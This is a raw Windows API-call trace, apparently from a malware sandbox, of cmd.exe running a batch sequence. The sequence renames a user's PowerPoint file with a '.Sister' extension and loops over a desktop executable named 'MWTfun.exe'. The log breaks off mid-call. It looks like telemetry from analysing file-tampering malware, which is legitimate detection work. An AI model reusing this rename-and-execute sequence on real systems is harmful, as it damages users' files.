[0303.929] ??_V@YAXPEAX@Z () returned 0x1 [0303.929] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192b1c40, ftCreationTime.dwHighDateTime=0x1d5e90d, ftLastAccessTime.dwLowDateTime=0xae74540, ftLastAccessTime.dwHighDateTime=0x1d5ead5, ftLastWriteTime.dwLowDateTime=0xae74540, ftLastWriteTime.dwHighDateTime=0x1d5ead5, nFileSizeHigh=0x0, nFileSizeLow=0x1670b, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="21UCEaK S0K_31H.pptx", cAlternateFileName="")) returned 1 [0303.929] GetProcessHeap () returned 0x21ed8c70000 [0303.929] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7bb70, Size=0x6c) returned 0x21ed8d67630 [0303.930] GetProcessHeap () returned 0x21ed8c70000 [0303.930] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67630) returned 0x6c [0303.930] GetProcessHeap () returned 0x21ed8c70000 [0303.930] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d55ee0 [0303.930] GetProcessHeap () returned 0x21ed8c70000 [0303.930] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d55ee0, Size=0x30) returned 0x21ed8d55ee0 [0303.930] GetProcessHeap () returned 0x21ed8c70000 [0303.930] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d55ee0) returned 0x30 [0303.930] GetProcessHeap () returned 0x21ed8c70000 [0303.930] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d55f20 [0303.931] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0303.931] GetProcessHeap () returned 0x21ed8c70000 [0303.931] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7c160 [0303.931] ??_V@YAXPEAX@Z () returned 0x1 [0303.931] GetProcessHeap () returned 0x21ed8c70000 [0303.931] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d55f20, Size=0x1c0) returned 0x21ed8d55f20 [0303.931] GetProcessHeap () returned 0x21ed8c70000 [0303.931] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d55f20) returned 0x1c0 [0303.931] GetProcessHeap () returned 0x21ed8c70000 [0303.931] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d560f0 [0303.931] GetProcessHeap () returned 0x21ed8c70000 [0303.931] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d560f0, Size=0x290) returned 0x21ed8d560f0 [0303.931] GetProcessHeap () returned 0x21ed8c70000 [0303.931] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d560f0) returned 0x290 [0303.931] GetProcessHeap () returned 0x21ed8c70000 [0303.932] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d56390 [0303.932] GetProcessHeap () returned 0x21ed8c70000 [0303.932] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d56390, Size=0x30) returned 0x21ed8d56390 [0303.932] GetProcessHeap () returned 0x21ed8c70000 [0303.932] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d56390) returned 0x30 [0303.932] GetProcessHeap () returned 0x21ed8c70000 [0303.932] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d563d0 [0303.932] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0303.932] GetProcessHeap () returned 0x21ed8c70000 [0303.932] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bfd0 [0303.932] ??_V@YAXPEAX@Z () returned 0x1 [0303.932] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0303.932] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0303.933] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0303.933] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ce80 [0303.934] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0303.934] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xdfb7ae88, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdfb7ae88, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8c7cfa0 [0303.934] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0303.934] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0303.934] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\21UCEaK S0K_31H.pptx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192b1c40, ftCreationTime.dwHighDateTime=0x1d5e90d, ftLastAccessTime.dwLowDateTime=0xae74540, ftLastAccessTime.dwHighDateTime=0x1d5ead5, ftLastWriteTime.dwLowDateTime=0xae74540, ftLastWriteTime.dwHighDateTime=0x1d5ead5, nFileSizeHigh=0x0, nFileSizeLow=0x1670b, dwReserved0=0x4, dwReserved1=0x7, cFileName="21UCEaK S0K_31H.pptx", cAlternateFileName="21UCEA~1.PPT")) returned 0x21ed8c7cac0 [0303.934] FindClose (in: hFindFile=0x21ed8c7cac0 | out: hFindFile=0x21ed8c7cac0) returned 1 [0303.935] _wcsnicmp (_String1="21UCEA~1.PPT", _String2="21UCEaK S0K_31H.pptx", _MaxCount=0x14) returned 19 [0303.935] malloc (_Size=0x1ff9c) returned 0x21eda11ffc0 [0303.936] ??_V@YAXPEAX@Z () returned 0x21eda11ffc0 [0303.937] GetProcessHeap () returned 0x21ed8c70000 [0303.937] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x30) returned 0x21ed8cc8b90 [0303.937] ??_V@YAXPEAX@Z () returned 0x1 [0303.937] ??_V@YAXPEAX@Z () returned 0x1 [0303.937] GetProcessHeap () returned 0x21ed8c70000 [0303.937] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d563d0, Size=0x1b8) returned 0x21ed8d563d0 [0303.937] GetProcessHeap () returned 0x21ed8c70000 [0303.937] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d563d0) returned 0x1b8 [0303.937] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0303.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.938] GetFileType (hFile=0x50) returned 0x2 [0303.938] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.938] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0303.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.938] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0303.945] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0303.946] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0303.946] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0303.946] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.946] GetFileType (hFile=0x50) returned 0x2 [0303.946] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.946] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0303.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.947] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0303.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.947] GetFileType (hFile=0x50) returned 0x2 [0303.947] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.947] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0303.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.948] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d55ef0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d55ef0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0303.949] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"21UCEaK S0K_31H.pptx\" \"21UCEaK S0K_31H.pptx.Sister\" ") returned 54 [0303.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.949] GetFileType (hFile=0x50) returned 0x2 [0303.949] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.949] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0303.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.950] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x36) returned 1 [0303.950] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0303.950] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.950] GetFileType (hFile=0x50) returned 0x2 [0303.950] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.950] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0303.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.951] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0303.951] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0303.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.951] GetFileType (hFile=0x50) returned 0x2 [0303.951] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.951] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0303.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.952] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0303.952] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0303.952] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.952] GetFileType (hFile=0x50) returned 0x2 [0303.952] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.952] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0303.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.953] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0303.953] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0303.953] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.953] GetFileType (hFile=0x50) returned 0x2 [0303.953] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.953] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0303.955] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.955] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0303.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.965] GetFileType (hFile=0x50) returned 0x2 [0303.965] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.965] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0303.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.966] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d563a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d563a0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0303.966] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"21UCEaK S0K_31H.pptx.Sister\" \"21UCEaK S0K_31H.bat\" ") returned 53 [0303.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.966] GetFileType (hFile=0x50) returned 0x2 [0303.966] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.966] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0303.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.966] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x35, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x35) returned 1 [0303.967] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0303.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.967] GetFileType (hFile=0x50) returned 0x2 [0303.967] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.967] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0303.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0303.967] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0303.971] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0303.974] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0303.974] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0303.974] malloc (_Size=0xffce) returned 0x21eda11ffc0 [0303.974] ??_V@YAXPEAX@Z () returned 0x21eda11ffc0 [0303.974] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0303.975] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0303.975] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0303.975] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0303.975] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0303.975] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0303.975] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0303.975] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0303.975] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0303.975] ??_V@YAXPEAX@Z () returned 0x1 [0303.975] GetProcessHeap () returned 0x21ed8c70000 [0303.975] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c7d200 [0303.975] GetProcessHeap () returned 0x21ed8c70000 [0303.975] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d200, Size=0x7c) returned 0x21ed8c7d200 [0303.975] GetProcessHeap () returned 0x21ed8c70000 [0303.975] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d200) returned 0x7c [0303.975] GetProcessHeap () returned 0x21ed8c70000 [0303.975] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x84) returned 0x21ed9379540 [0303.975] GetProcessHeap () returned 0x21ed8c70000 [0303.975] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c72720 [0303.975] GetProcessHeap () returned 0x21ed8c70000 [0303.975] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c72720, Size=0x7c) returned 0x21ed8c72720 [0303.975] GetProcessHeap () returned 0x21ed8c70000 [0303.976] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c72720) returned 0x7c [0303.976] malloc (_Size=0xffce) returned 0x21eda11ffc0 [0303.976] ??_V@YAXPEAX@Z () returned 0x21eda11ffc0 [0303.976] GetProcessHeap () returned 0x21ed8c70000 [0303.976] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cfa0 [0303.976] GetProcessHeap () returned 0x21ed8c70000 [0303.976] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d30b50 [0303.976] _wcsicmp (_String1="21UCEaK S0K_31H.pptx", _String2=".") returned 4 [0303.976] _wcsicmp (_String1="21UCEaK S0K_31H.pptx", _String2="..") returned 4 [0303.976] GetFileAttributesW (lpFileName="21UCEaK S0K_31H.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\21uceak s0k_31h.pptx")) returned 0x20 [0303.976] GetProcessHeap () returned 0x21ed8c70000 [0303.976] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9380080 [0303.978] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9380090 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0303.978] SetErrorMode (uMode=0x0) returned 0x0 [0303.978] SetErrorMode (uMode=0x1) returned 0x0 [0303.978] GetFullPathNameW (in: lpFileName="21UCEaK S0K_31H.pptx", nBufferLength=0x7fe7, lpBuffer=0x21eda11ffc0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\21UCEaK S0K_31H.pptx", lpFilePart=0xa6cf4fd660*="21UCEaK S0K_31H.pptx") returned 0x2e [0303.978] SetErrorMode (uMode=0x0) returned 0x1 [0303.978] GetProcessHeap () returned 0x21ed8c70000 [0303.978] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d31ed0 [0303.978] _wcsicmp (_String1="21UCEaK S0K_31H.pptx", _String2=".") returned 4 [0303.978] _wcsicmp (_String1="21UCEaK S0K_31H.pptx", _String2="..") returned 4 [0303.978] GetFileAttributesW (lpFileName="21UCEaK S0K_31H.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\21uceak s0k_31h.pptx")) returned 0x20 [0303.979] ??_V@YAXPEAX@Z () returned 0x1 [0303.979] malloc (_Size=0xffce) returned 0x21eda11ffc0 [0303.979] ??_V@YAXPEAX@Z () returned 0x21eda11ffc0 [0303.979] malloc (_Size=0xffce) returned 0x21eda12ffa0 [0303.979] ??_V@YAXPEAX@Z () returned 0x21eda12ffa0 [0303.979] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\21UCEaK S0K_31H.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\21uceak s0k_31h.pptx")) returned 0x20 [0303.979] malloc (_Size=0xffce) returned 0x21ed993f900 [0303.979] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0303.979] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\21UCEaK S0K_31H.pptx", fInfoLevelId=0x1, lpFindFileData=0x21ed8d30b60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8d30b60) returned 0x21ed8c7cbe0 [0303.980] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0303.980] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0303.980] ??_V@YAXPEAX@Z () returned 0x1 [0303.980] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\21UCEaK S0K_31H.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\21uceak s0k_31h.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\21UCEaK S0K_31H.pptx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\21uceak s0k_31h.pptx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0303.981] FindNextFileW (in: hFindFile=0x21ed8c7cbe0, lpFindFileData=0x21ed8d30b60 | out: lpFindFileData=0x21ed8d30b60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192b1c40, ftCreationTime.dwHighDateTime=0x1d5e90d, ftLastAccessTime.dwLowDateTime=0xae74540, ftLastAccessTime.dwHighDateTime=0x1d5ead5, ftLastWriteTime.dwLowDateTime=0xae74540, ftLastWriteTime.dwHighDateTime=0x1d5ead5, nFileSizeHigh=0x0, nFileSizeLow=0x1670b, dwReserved0=0x0, dwReserved1=0x0, cFileName="21UCEaK S0K_31H.pptx", cAlternateFileName="")) returned 0 [0303.982] GetLastError () returned 0x12 [0303.982] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0303.982] ??_V@YAXPEAX@Z () returned 0x1 [0303.982] ??_V@YAXPEAX@Z () returned 0x1 [0303.982] ??_V@YAXPEAX@Z () returned 0x1 [0303.982] ??_V@YAXPEAX@Z () returned 0x1 [0303.982] GetProcessHeap () returned 0x21ed8c70000 [0303.982] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cca0 [0303.982] GetProcessHeap () returned 0x21ed8c70000 [0303.982] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95820, Size=0x16) returned 0x21ed8c954e0 [0303.982] GetProcessHeap () returned 0x21ed8c70000 [0303.982] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c954e0) returned 0x16 [0303.982] GetProcessHeap () returned 0x21ed8c70000 [0303.982] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45c20, Size=0x20) returned 0x21ed8d45cb0 [0303.983] GetProcessHeap () returned 0x21ed8c70000 [0303.983] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45cb0) returned 0x20 [0303.983] GetProcessHeap () returned 0x21ed8c70000 [0303.983] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d6b980 [0303.983] GetProcessHeap () returned 0x21ed8c70000 [0303.983] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b980, Size=0xb2) returned 0x21ed8c96dc0 [0303.983] GetProcessHeap () returned 0x21ed8c70000 [0303.983] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c96dc0) returned 0xb2 [0303.983] GetProcessHeap () returned 0x21ed8c70000 [0303.983] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d565a0 [0303.983] GetProcessHeap () returned 0x21ed8c70000 [0303.983] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d565a0, Size=0x30) returned 0x21ed8d565a0 [0303.983] GetProcessHeap () returned 0x21ed8c70000 [0303.983] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d565a0) returned 0x30 [0303.983] GetProcessHeap () returned 0x21ed8c70000 [0303.983] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d565e0 [0303.983] malloc (_Size=0x1ff9c) returned 0x21eda11ffc0 [0303.984] GetProcessHeap () returned 0x21ed8c70000 [0303.984] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c964c0 [0303.984] GetProcessHeap () returned 0x21ed8c70000 [0303.984] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96a00 [0303.984] ??_V@YAXPEAX@Z () returned 0x1 [0303.984] malloc (_Size=0x1ff9c) returned 0x21eda11ffc0 [0303.984] GetProcessHeap () returned 0x21ed8c70000 [0303.984] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c961c0 [0303.984] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda11ffc0, lpFilePart=0xa6cf4fdd08 | out: 